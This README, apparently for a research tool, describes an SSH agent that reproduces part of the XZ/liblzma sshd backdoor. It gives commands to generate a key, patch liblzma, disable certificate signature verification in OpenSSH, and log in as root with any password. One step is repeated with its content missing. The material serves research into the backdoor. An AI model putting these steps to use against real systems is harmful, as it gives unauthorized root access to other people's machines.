Simple SSH Agent that implements some of the XZ sshd backdoor functionality.
For those who want to more easily explore the backdoor using a typical SSH client.
- Generate your own ed448 private key
openssl genpkey -algorithm ED448 -outform PEM -out privkey.pem
- Patch your liblzma.so with the ed448 pubkey
python3 scripts/patch_liblzma.py privkey.pem liblzma.so liblzma_patched.so
- Patch your SSH client to skip verification of the certificate:
- Look for this section in openssh's
sshkey.c
and commment it out:
if ((ret = sshkey_verify(key->cert->signature_key, sig, slen, sshbuf_ptr(key->cert->certblob), signed_len, NULL, 0, NULL)) != 0) { goto out; }
- Look for this section in openssh's
python3 -m virtualenv venv && . venv/bin/activate && pip install -r requirements.txt
python3 agent.py /tmp/agent ./privkey.pem
SSH_AUTH_SOCK=/tmp/agent ./ssh root@localhost
- log in with any password :)
-- blasty <[email protected]>